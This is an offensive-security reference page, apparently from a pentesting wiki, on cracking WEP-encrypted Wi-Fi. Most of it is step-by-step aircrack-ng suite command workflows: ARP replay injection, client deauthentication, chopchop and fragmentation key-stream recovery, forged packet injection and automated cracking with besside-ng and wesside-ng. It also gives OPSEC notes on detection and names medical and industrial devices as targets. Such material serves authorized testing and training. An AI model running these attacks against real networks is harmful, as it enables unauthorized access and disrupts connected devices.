WEP Attacks
#Overview
Wired Equivalent Privacy (WEP) is the original 802.11 encryption protocol, standardized in 1997 and comprehensively broken since 2004. It uses RC4 with a 24-bit Initialization Vector (IV) that repeats on busy networks, making it trivially exploitable. WEP was officially deprecated by the Wi-Fi Alliance in 2004, but it still appears on:
- Legacy embedded devices (industrial controllers, medical equipment)
- Old consumer routers with default configurations
- IoT devices with constrained firmware
- CTF challenges and training environments
Time to crack: Typically 3–10 minutes with active injection, under 5 minutes on busy networks.
#WEP Vulnerability Summary
| Vulnerability | Impact | Exploitation |
|---|---|---|
| 24-bit IV space | IVs repeat every ~5,000 packets on busy networks | Collect IVs → statistical key recovery |
| Key reuse | Same IV + key stream reveals plaintext XOR | XOR captured packets to recover key stream |
| RC4 key scheduling | Weak FMS keys reveal key bytes statistically | FMS/KoreK statistical attack |
| Authentication spoofing | Shared Key Authentication leaks key stream | Chopchop/fragmentation recover key stream |
| No integrity protection | ICV is CRC-32, modifiable by attacker | Packet injection, bit-flipping |
#Attack Workflows
#Method 1: Aircrack-ng Standard (FMS/KoreK)
The most common approach — collect IVs, then crack statistically.
# Step 1: Start monitor mode
sudo airmon-ng start wlan0
# Step 2: Identify WEP target
sudo airodump-ng wlan0mon --encrypt WEP
# Step 3: Targeted capture (lock to channel and BSSID)
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wep-target
# Step 4: Accelerate IV collection with aireplay-ng (ARP replay)
# This injects ARP requests to force the AP to generate new IVs
sudo aireplay-ng -3 -b <AP_MAC> -h <CLIENT_MAC> wlan0mon
# Step 5: Deauth a client to force reconnection (generates IVs)
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
# Step 6: Crack when 10,000+ IVs collected (5,000 may suffice on busy networks)
aircrack-ng wep-target-01.cap
BASH
#Method 2: Chopchop Attack (No Client Needed)
When no connected clients are available for ARP replay, use the chopchop attack to decrypt packets one byte at a time.
# Step 1: Capture some traffic
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wep-chopchop
# Step 2: Run chopchop attack
sudo aireplay-ng -4 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# This will output a .dec file with the decrypted packet
# and create a .xor file with the key stream
# Step 3: Forge an ARP packet using the recovered key stream
packetforge-ng -0 -a <AP_MAC> -h <YOUR_MAC> \
-l 192.168.1.100 -k 192.168.1.255 \
-y wep-chopchop.xor -w forged-arp.cap
# Step 4: Inject the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon
# Step 5: Crack with collected IVs
aircrack-ng wep-chopchop-01.cap
BASH
#Method 3: Fragmentation Attack
Similar to chopchop but recovers the full key stream faster. Requires at least one packet from the AP.
# Step 1: Start capture
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wep-frag
# Step 2: Run fragmentation attack
sudo aireplay-ng -5 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# This creates a .xor key stream file
# Step 3: Forge ARP packet
packetforge-ng -0 -a <AP_MAC> -h <YOUR_MAC> \
-l 192.168.1.100 -k 192.168.1.255 \
-y fragment-*.xor -w forged-frag.cap
# Step 4: Inject forged packet
sudo aireplay-ng -2 -r forged-frag.cap wlan0mon
# Step 5: Crack
aircrack-ng wep-frag-01.cap
BASH
#Method 4: Besside-ng (Automated)
Automated WEP cracking tool that handles the entire process.
# Automatic WEP cracking (one command)
sudo besside-ng wlan0mon -W
# Against a specific target
sudo besside-ng wlan0mon -b <AP_MAC> -W
# Results saved to /tmp/besside/ with cracked key
BASH
#Method 5: Wesside-ng (Fully Automated)
The most automated option — discovers WEP networks and cracks them automatically.
# Fully automated WEP attack
sudo wesside-ng wlan0mon
# Against specific target
sudo wesside-ng -i wlan0mon -a <AP_MAC>
BASH
#Practical Considerations
#When WEP Still Matters
- Industrial control systems — SCADA devices, PLCs, and HMI panels often run WEP
- Medical devices — Older patient monitors and imaging equipment
- IoT sensors — Low-power devices that can't support WPA2's computational requirements
- Hotel/conference rooms — Old APs still configured for WEP compatibility
- CTF challenges — WEP cracking is a common CTF skill
#IV Collection Speed
| Method | IVs/minute | Time to 10,000 IVs |
|---|---|---|
| Passive (no injection) | 50–200 | 50–200 min |
| ARP replay (with client) | 500–2,000 | 5–20 min |
| Chopchop (no client) | 100–500 | 20–100 min |
| Fragmentation (no client) | 200–1,000 | 10–50 min |
#Minimum IVs Required
| Key Size | Minimum IVs | Recommended |
|---|---|---|
| 64-bit (40-bit key + 24-bit IV) | 4,000 | 10,000 |
| 128-bit (104-bit key + 24-bit IV) | 10,000 | 40,000 |
| 256-bit (uncommon) | 20,000 | 100,000 |
#Common Pitfalls
- "No data captured" — IV collection requires active traffic. Use aireplay-ng to inject ARP requests.
- "No key found" — Collect more IVs. Try again at 20,000, 40,000, 80,000.
- Channel hopping — Lock your adapter to the target channel with
--channel <CH>. - Adapter doesn't inject — Not all adapters support packet injection. Use an Alfa AWUS036ACH or similar chipset known for injection.
- Shared Key Authentication (SKA) — If the AP uses SKA instead of Open System, you must capture a SKA handshake before ARP replay works. Use
airodump-ngwith--encrypt WEPto identify the auth type.
#OPSEC Considerations
- ARP replay injection generates abnormal traffic patterns that WIDS/WIPS detect
- Deauthentication frames are logged by enterprise APs
- WEP cracking tools create monitor-mode interfaces visible to network scanning
- Always verify scope authorization — WEP cracking on production networks can cause instability
#Cross-References
- WPA/WPA2 Cracking — For modern WiFi networks
- PMKID Attack — Stealthier alternative to handshake capture
- 01 - Pre-Foothold — Passive wireless survey before active attack
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| aircrack-ng | WEP/WPA capture and cracking suite | https://www.aircrack-ng.org/ |
| besside-ng | Automated WEP/WPA cracking | https://www.aircrack-ng.org/ |
| wesside-ng | Fully automated WEP attack | https://www.aircrack-ng.org/ |
| packetforge-ng | Forge encrypted packets for injection | https://www.aircrack-ng.org/ |
#Source Machines
- No specific HTB machines; WEP networks appear in CTF challenges and legacy environments